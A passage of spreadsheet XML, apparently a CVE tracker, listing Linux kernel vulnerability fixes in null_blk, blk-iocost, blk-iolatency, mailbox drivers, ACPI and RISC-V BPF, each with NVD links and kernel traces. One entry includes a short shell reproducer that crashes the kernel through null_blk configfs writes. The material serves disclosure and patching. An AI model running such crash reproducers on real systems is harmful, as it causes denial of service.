      <c r="R550" s="5" t="inlineStr"/>
      <c r="S550" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
blk-iocost: clear delay state when freeing policy data
iocg_kick_delay() turns sufficiently large debt into an explicit
block-cgroup delay with blkcg_set_delay(), setting blkg-&gt;use_delay to
-1 and incrementing blkcg-&gt;congestion_count.  Clearing it again depends
on iocg_kick_delay() running from the period timer, the waitq timer or
the issue path.
ioc_pd_free() removes the iocg from active_iocgs and cancels its waitq
timer, and no further bios can arrive, so once it has run nothing is
left which can reduce the debt and clear the delay.  The blkcg stays
marked congested for the rest of its life.
blk_cgroup_congested() then returns true for every task in that cgroup
and its descendants: page_cache_sync_ra() cuts readahead to a single
page, page_cache_async_ra() skips it altogether, and
__folio_throttle_swaprate() takes swap_avail_lock and schedules a
throttle on anonymous folio allocation.
Clear it explicitly, after the list removal and the synchronous
hrtimer_cancel() so that neither timer processing nor an I/O path can
re-arm it.  The free callback can also see policy data which was never
attached to a blkg, hence the pd-&gt;blkg check.</t>
        </is>
      </c>
      <c r="T550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90182</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90183</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2026-09-17</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr"/>
      <c r="S551" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
blk-iolatency: clear delay state when freeing policy data
io.latency can throttle a group which has no latency target of its own.
When a sibling misses its target, check_scale_change() scales down its
peers, and a peer that reaches queue depth one gets blkcg_use_delay()
called on it on every further scale-down, even with min_lat_nsec == 0.
iolatency_pd_offline() resets the target through
iolatency_set_min_lat_nsec(), which clears the delay only on a nonzero
to zero transition, so it never clears such a peer.  Freeing the policy
data then leaves blkg-&gt;use_delay set and blkcg-&gt;congestion_count
elevated with nothing left that can drop it.
blk_cgroup_congested() then returns true for every task in that cgroup
and its descendants for as long as the cgroup lives: page_cache_sync_ra()
cuts readahead to a single page, page_cache_async_ra() skips it
altogether, and __folio_throttle_swaprate() takes swap_avail_lock and
schedules a throttle on anonymous folio allocation.
Clear the delay in iolatency_pd_free().  By then bio-held blkg
references have drained, or the queue is frozen for policy
deactivation, so check_scale_change() cannot re-arm it.  The free
callback can also see policy data which was never attached to a blkg,
hence the pd-&gt;blkg check.</t>
        </is>
      </c>
      <c r="T551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90183</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90184</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2026-09-17</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr"/>
      <c r="S552" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: serialize configfs attribute updates with device setup
The attribute store methods generated with NULLB_DEVICE_ATTR() refuse to
change the configuration of a live device by testing
NULLB_DEV_FL_CONFIGURED, but that flag is only set by
nullb_device_power_store() after null_add_dev() has returned, and the
store methods take no lock at all. configfs only serializes writes to
the same open file (buffer-&gt;mutex), so a write to any attribute can run
concurrently with null_add_dev() and change the device configuration
while it is being used.
null_add_dev() reads the configuration several times, e.g. dev-&gt;zoned is
read once to set up the queue limits and once to initialize the zone
resources:
  CPU0: echo 1 &gt; nullb0/power         CPU1: echo 1 &gt; nullb0/zoned
  nullb_device_power_store()
    mutex_lock(&amp;lock)
    null_add_dev()
      if (dev-&gt;zoned) -&gt; false
        /* no BLK_FEAT_ZONED */       nullb_device_zoned_store()
                                        test_bit(FL_CONFIGURED) -&gt; 0
                                        dev-&gt;zoned = true
      blk_mq_alloc_disk()
        /* queue is not zoned */
      if (nullb-&gt;dev-&gt;zoned) -&gt; true
        null_register_zoned_dev()
          blk_revalidate_disk_zones()
blk_revalidate_disk_zones() is then called for a queue that does not
have BLK_FEAT_ZONED set, which triggers its WARN_ON_ONCE() and fails the
device setup with -EIO:
  WARNING: CPU: 2 PID: 322 at block/blk-zoned.c:2357 blk_revalidate_disk_zones+0x4c/0x560
Clearing dev-&gt;zoned in the same window is worse: the queue is created
with BLK_FEAT_ZONED but the zone resources are never initialized, so
add_disk() succeeds for a zoned disk that has no zones. And a store that
lands after the last dev-&gt;zoned test leaves dev-&gt;zoned set while
dev-&gt;zones is still NULL, which null_process_zoned_cmd() dereferences on
the first write.
Fix this by taking the global lock, which nullb_device_power_store()
already holds across null_add_dev() and null_del_dev(), around both the
NULLB_DEV_FL_CONFIGURED test and the update of the device configuration.
The submit_queues and poll_queues apply callbacks are now called with
that lock held, so remove the locking they did themselves.
Since the store methods can run as soon as configfs_register_subsystem()
returns, that is, before null_init() gets to mutex_init(&amp;lock), also
initialize the lock statically with DEFINE_MUTEX().</t>
        </is>
      </c>
      <c r="T552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90184</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90185</t>
        </is>
      </c>
      <c r="D553" s="5" t="inlineStr"/>
      <c r="E553" s="5" t="inlineStr"/>
      <c r="F553" s="5" t="inlineStr"/>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q553" s="5" t="inlineStr"/>
      <c r="R553" s="5" t="inlineStr"/>
      <c r="S553" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: serialize configfs attribute stores with the lock
The NULLB_DEVICE_ATTR _store takes no lock: apply_fn attributes
(submit_queues, poll_queues) get dev-&gt;NAME written again after apply_fn
returns, outside its lock; APPLY=NULL attributes are entirely lockless.
configfs only serializes stores per-open-file, so concurrent stores on
separate fds race.
For apply_fn attributes, once one store's apply_fn has reconfigured the
hardware, a second (losing) store can still overwrite dev-&gt;NAME
afterwards. This leaves dev-&gt;submit_queues out of sync with the live
queue count, which is later caught by the WARN_ON_ONCE() in
null_map_queues().
For !apply_fn attributes, power_store()'s null_add_dev() validates and
builds the device under "lock" but only sets CONFIGURED afterwards. A store
slipping in during this window can change a field mid-setup -- for example,
zone_nr_conv can be pushed above nr_zones after it has already been
clamped, leading to an out-of-bounds dev-&gt;zones[] access.
Take "lock" in the macro around the apply_fn call, the CONFIGURED test and
the field write, and move it out of nullb_apply_submit_queues()/
nullb_apply_poll_queues() so both paths are covered once. This serializes
stores with power_store's setup and with each other.</t>
        </is>
      </c>
      <c r="T553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90185</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90186</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2026-09-17</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q554" s="5" t="inlineStr"/>
      <c r="R554" s="5" t="inlineStr"/>
      <c r="S554" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: reject per-device queue resize for shared tag set
When shared_tags is enabled, null_setup_tagset() makes the device use the
global tag_set, whose driver_data stays NULL. null_map_queues() therefore
falls back to the module-wide g_submit_queues/g_poll_queues instead of any
per-device value.
Resizing submit_queues or poll_queues via configfs on such a device calls
blk_mq_update_nr_hw_queues() on the shared set, shrinking
set-&gt;nr_hw_queues.  __blk_mq_realloc_hw_ctxs() only grows the
q-&gt;queue_hw_ctx[] allocation, so on shrink it merely exits and NULLs the
now-excess hctx slots. null_map_queues(), however, keeps mapping CPUs with
the unchanged g_submit_queues/g_poll_queues, so mq_map[] ends up pointing
at those NULLed hctx slots. blk_mq_map_swqueue() then dereferences the NULL
hctx (hctx-&gt;cpumask), crashing the kernel:
[  460.218374] KASAN: null-ptr-deref in range [0x0000000000000098-0x000000000000009f]
[  460.219003] CPU: 24 UID: 0 PID: 1492 Comm: sh Not tainted 7.2.0-rc2+ #67 PREEMPT(full)
[  460.219792] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc41 04/01/2014
[  460.220452] RIP: 0010:blk_mq_map_swqueue+0x4db/0x1430
......
[  460.228977] Call Trace:
[  460.229175]  &lt;TASK&gt;
[  460.229354]  blk_mq_update_nr_hw_queues+0xd49/0x11c0
[  460.229779]  ? __pfx_blk_mq_update_nr_hw_queues+0x10/0x10
[  460.230200]  nullb_update_nr_hw_queues+0x1a9/0x370 [null_blk]
[  460.230694]  nullb_device_submit_queues_store+0xd9/0x170 [null_blk]
[  460.231190]  ? __pfx_nullb_device_submit_queues_store+0x10/0x10 [null_blk]
[  460.231776]  ? configfs_write_iter+0x35c/0x4e0
[  460.232122]  configfs_write_iter+0x286/0x4e0
[  460.232460]  vfs_write+0x52d/0xd00
[  460.232779]  ? __x64_sys_openat+0x108/0x1d0
[  460.233106]  ? __pfx_vfs_write+0x10/0x10
[  460.233413]  ? fdget_pos+0x1cf/0x4c0
[  460.233745]  ? fput_close+0x133/0x190
[  460.234038]  ? __pfx_expand_files+0x10/0x10
[  460.234368]  ksys_write+0xfc/0x1d0
Reproducer:
modprobe null_blk shared_tags=1 submit_queues=64 poll_queues=1
mkdir /sys/kernel/config/nullb/dev
echo 1 &gt; /sys/kernel/config/nullb/dev/power
echo 1 &gt; /sys/kernel/config/nullb/dev/submit_queues
A per-device resize of a shared tag set is meaningless anyway, so reject it
with -EINVAL in nullb_update_nr_hw_queues() when the device is bound to the
global tag_set.</t>
        </is>
      </c>
      <c r="T554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90186</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90187</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2026-09-17</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q555" s="5" t="inlineStr"/>
      <c r="R555" s="5" t="inlineStr"/>
      <c r="S555" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: free zones array on device power-off
null_init_zoned_dev() allocates dev-&gt;zones when a zoned device is powered
on, but null_del_dev() never frees it on power-off; dev-&gt;zones is only
freed later in null_free_dev(), when the configfs directory is removed. If
the device is powered off and then on again, null_init_zoned_dev()
allocates a new array and overwrites the dev-&gt;zones pointer, leaking the
previous allocation each power cycle.
Free dev-&gt;zones in null_del_dev() via null_free_zoned_dev() to solve it.
And calling null_free_zoned_dev() in null_free_dev() is no longer necessary
because every caller already invokes null_del_dev() first: via
nullb_group_drop_item() before nullb_device_release(), in the
null_add_dev() error path of null_create_dev(), and in null_destroy_dev().
Remove the redundant call.
And take &amp;lock around zone_cond_store() in the two store wrappers to
serialize dev-&gt;zones check-and-deref against its alloc/free, which already
run under &amp;lock. The reason there was no problem before is that only
nullb_device_release() or null_exit() frees the dev-&gt;zones, which
guarantees that subsequent users won't access the configfs interface.</t>
        </is>
      </c>
      <c r="T555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90187</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90188</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2026-09-17</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q556" s="5" t="inlineStr"/>
      <c r="R556" s="5" t="inlineStr"/>
      <c r="S556" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: free global tag_set on init error path
If shared_tags is enabled, null_setup_tagset() allocates the global tag_set
via null_init_global_tag_set(). If device creation later fails, err_dev
destroys the default devices and calls unregister_blkdev(), but never frees
the global tag_set. Since module init failed, null_exit() is never invoked,
so the global tag_set's tags and maps are permanently leaked.
Free the global tag_set in err_dev, matching null_exit() which does
if (tag_set.ops) blk_mq_free_tag_set(&amp;tag_set).</t>
        </is>
      </c>
      <c r="T556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90188</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90189</t>
        </is>
      </c>
      <c r="D557" s="5" t="inlineStr"/>
      <c r="E557" s="5" t="inlineStr"/>
      <c r="F557" s="5" t="inlineStr"/>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr"/>
      <c r="S557" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: register configfs subsystem after creating default devices
In null_init(), configfs_register_subsystem() currently runs before
register_blkdev(), so when null_blk is built as a module, a racing mkdir()
+ poweron from userspace can reach null_add_dev() while null_major is still
0. __add_disk() then hits WARN_ON(disk-&gt;minors) (major=0 with minors!=0)
and fails:
[root@fedora ~]# [ 2366.521436] WARNING: block/genhd.c:476 at __add_disk+0x8a7/0xde0,
[ 2366.523552] Modules linked in: null_blk(+) nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib
[ 2366.529081] CPU: 26 UID: 0 PID: 1600 Comm: sh Not tainted 7.2.0-rc1+ #66 PREEMPT(full)
......
[ 2366.547251] Call Trace:
[ 2366.547575]  &lt;TASK&gt;
[ 2366.547831]  ? _raw_spin_lock+0x84/0xe0
[ 2366.548260]  add_disk_fwnode+0x114/0x560
[ 2366.548739]  null_add_dev+0x102d/0x1b80 [null_blk]
[ 2366.549310]  ? __pfx_null_add_dev+0x10/0x10 [null_blk]
[ 2366.549906]  ? mutex_lock+0xde/0x1c0
[ 2366.550361]  ? __pfx_mutex_lock+0x10/0x10
[ 2366.550827]  nullb_device_power_store+0x1e7/0x280 [null_blk]
[ 2366.551499]  ? __pfx_nullb_device_power_store+0x10/0x10 [null_blk]
[ 2366.552177]  ? __kmalloc_cache_noprof+0x1f5/0x470
[ 2366.552748]  ? configfs_write_iter+0x35c/0x4e0
[ 2366.553242]  configfs_write_iter+0x286/0x4e0
[ 2366.553787]  vfs_write+0x52d/0xd00
[ 2366.554169]  ? __pfx_vfs_write+0x10/0x10
[ 2366.554679]  ? __pfx___css_rstat_updated+0x10/0x10
[ 2366.555196]  ? fdget_pos+0x1cf/0x4c0
[ 2366.555649]  ksys_write+0xfc/0x1d0
......
Additionally, the err_dev path destroys all devices on nullb_list while
configfs is still registered. If a racing mkdir() + poweron puts a user
device on the list, null_destroy_dev()-&gt;null_free_dev() kfrees the user
device's nullb_device but /sys/kernel/config/nullb/&lt;name&gt; is still
reachable. Any userspace access to the item will trigger a UAF.
For simplicity, move configfs_register_subsystem() to the end to solve
the problems above.</t>
        </is>
      </c>
      <c r="T557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90189</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90190</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2026-09-17</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr"/>
      <c r="S558" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
null_blk: use DEFINE_MUTEX for the file-scope mutex
In null_init(), mutex_init(&amp;lock) currently happens after
configfs_register_subsystem(), which exposes the nullb subsystem to
userspace. A racing mkdir() into /sys/kernel/config/nullb/ can reach
null_find_dev_by_name() -&gt; mutex_lock(&amp;lock) before the mutex is
initialized, trigger warning:
[  123.137788] DEBUG_LOCKS_WARN_ON(lock-&gt;magic != lock)
[  123.137796] WARNING: kernel/locking/mutex.c:159 at mutex_lock+0x171/0x1c0, CPU#13: mkdir/1301
[  123.140090] Modules linked in: null_blk(+) nft_fib_inet nft_fib_ipv4
......
[  123.154926] Call Trace:
[  123.155172]  &lt;TASK&gt;
[  123.155419]  ? __pfx_mutex_lock+0x10/0x10
[  123.156181]  ? __pfx__raw_spin_lock+0x10/0x10
[  123.156571]  nullb_group_make_group+0x20/0x100 [null_blk]
[  123.157011]  configfs_mkdir+0x47b/0xc70
[  123.157337]  ? __pfx_configfs_mkdir+0x10/0x10
[  123.157719]  ? may_create_dentry+0x242/0x2e0
[  123.158061]  vfs_mkdir+0x2a9/0x6c0
[  123.158352]  filename_mkdirat+0x3dc/0x500
[  123.158710]  ? __pfx_filename_mkdirat+0x10/0x10
[  123.159070]  ? strncpy_from_user+0x3a/0x1d0
[  123.159413]  __x64_sys_mkdir+0x6b/0x90
[  123.159760]  do_syscall_64+0xea/0x600
Replace the runtime mutex_init(&amp;lock) with a static DEFINE_MUTEX(lock)
declaration to fix this issue.</t>
        </is>
      </c>
      <c r="T558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90190</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90191</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2026-09-17</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr"/>
      <c r="S559" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mailbox: riscv-sbi-mpxy: validate RPMI notification lengths
The SBI return value controls how many bytes are copied from shared
memory into the RPMI notification buffer. It is not validated against
the negotiated shared-memory size before that copy. The event walker
also uses a reversed loop condition and can inspect a short event record.
Validate the complete notification length before copying it, iterate only
while a full event header remains, and stop when a declared event payload
extends beyond the copied notification data.</t>
        </is>
      </c>
      <c r="T559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90191</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90192</t>
        </is>
      </c>
      <c r="D560" s="5" t="inlineStr"/>
      <c r="E560" s="5" t="inlineStr"/>
      <c r="F560" s="5" t="inlineStr"/>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr"/>
      <c r="S560" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mailbox: qcom-cpucp: handle NULL data in send_data callback
mailbox_clear_channel() calls mbox_send_message() with NULL data to
notify the remote side that the RX channel has been cleared.
qcom_cpucp_mbox_send_data() blindly dereferenced the data pointer,
causing a NULL pointer dereference kernel panic when invoked from
this path under PREEMPT_RT.
Add an explicit NULL check and return early without writing to the
TX register, which is the correct behaviour for a channel-clear
notification.</t>
        </is>
      </c>
      <c r="T560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90192</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90193</t>
        </is>
      </c>
      <c r="D561" s="5" t="inlineStr"/>
      <c r="E561" s="5" t="inlineStr"/>
      <c r="F561" s="5" t="inlineStr"/>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="inlineStr"/>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr"/>
      <c r="S561" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mailbox: qcom-cpucp: fix PREEMPT_RT self-deadlock in IRQ handler
qcom_cpucp_mbox_irq_fn() calls mbox_chan_received_data() while holding
chan-&gt;lock. Under PREEMPT_RT, spin_lock_irqsave() is converted to an
rt_spinlock (rtmutex-based), which tracks ownership and can sleep.
The callback chain triggered by mbox_chan_received_data() eventually
reaches mailbox_clear_channel() -&gt; mbox_send_message() -&gt; add_to_rbuf(),
which attempts to re-acquire the same chan-&gt;lock. Since rtmutex detects
the re-entrant lock attempt by the same owner, the thread blocks waiting
for a lock it already holds, causing a permanent deadlock.
This deadlock manifests as 'irq/N-apss_cpucp_mbox' stuck in D state
with the following call trace:
  rt_spin_lock -&gt; mbox_send_message -&gt; mailbox_clear_channel -&gt;
  scmi_rx_callback -&gt; mbox_chan_received_data [&lt;- held chan-&gt;lock here]
Fix by saving chan-&gt;cl locally and clearing the HW interrupt register
inside the lock, then invoking mbox_chan_received_data() after releasing
the lock. This preserves the mutual exclusion for chan-&gt;cl access while
avoiding the lock re-entrancy that causes the PREEMPT_RT deadlock.</t>
        </is>
      </c>
      <c r="T561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90193</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90194</t>
        </is>
      </c>
      <c r="D562" s="5" t="inlineStr"/>
      <c r="E562" s="5" t="inlineStr"/>
      <c r="F562" s="5" t="inlineStr"/>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr"/>
      <c r="S562" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: scan: fix bus ID cleanup on device_add() failures
When device_add() fails after acpi_device_set_name() has allocated an
instance ID and a new acpi_device_bus_id has been linked into
acpi_bus_id_list, the rollback path only removes wakeup_list and
detaches the ACPI handle data.
That leaves the bus-ID bookkeeping behind and keeps the allocated
instance number consumed.
Move the bus-ID cleanup and wakeup-list removal into a single helper.
Use it from both the normal device teardown path and the device_add()
rollback path. The wakeup list node is initialized before registration,
so it can be deleted without checking whether the device is wakeup-
capable like in the original teardown path.
[ rjw: Rename acpi_device_del_list() to acpi_device_cleanup() ]
[ rjw: Subject and changelog edits ]</t>
        </is>
      </c>
      <c r="T562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90194</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90195</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2026-09-17</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr"/>
      <c r="S563" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
riscv, bpf: Fix missing sign-ext for signed 1-byte and 2-byte kfunc args
On RV64, the ABI requires sign-extension for signed 1-byte and 2-byte kfunc
args. However, the RV64 JIT currently does not perform sign-extension for
such kfunc args.
Before commit 7ce090afbf72 ("bpf: Infer zext_dst based on static register
liveness analysis"), state pruning could potentially omit zero-extension
of 32-bit subregisters, which inadvertently masked the above issue by making
the args appear as if they had been properly sign-extended. After that
commit, the problem is exposed, causing the kfunc_call/kfunc_call_test4
selftest to fail.
Fix this by extending the existing sign-extension logic to handle signed
1-byte and 2-byte kfunc args as well.</t>
        </is>
      </c>
      <c r="T563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90195</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90196</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2026-09-17</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr"/>
      <c r="S564" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: SOF: validate topology volume range before allocation
